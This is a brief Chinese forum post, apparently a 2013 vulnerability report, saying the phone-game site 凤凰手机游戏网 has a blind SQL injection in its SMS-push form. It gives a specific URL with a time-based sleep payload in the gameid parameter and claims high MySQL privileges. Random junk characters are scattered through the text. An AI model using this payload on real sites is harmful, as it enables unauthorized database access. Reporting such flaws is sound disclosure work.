简要描述:8 y, E) u4 V# E* s& w
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。, O+ T6 _& B! x$ i I. _
7 r+ [7 g- W& Z! h; D
详细说明:
" e& y+ S1 o7 T8 h- ^. A0 w存在SQL盲注url:
# G! p* q& E( |2 ^+ e. {5 a- R" ^fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
; o) y' ~$ N1 K1 Q! g; A5 yhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png- S n6 m: e. L0 J
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
9 N5 ?" O0 j/ n% i$ h. Uhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
+ g+ w% H& r8 v0 I5 ?6 M, }% ?+ J0 \1 W' ^2 L6 K
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对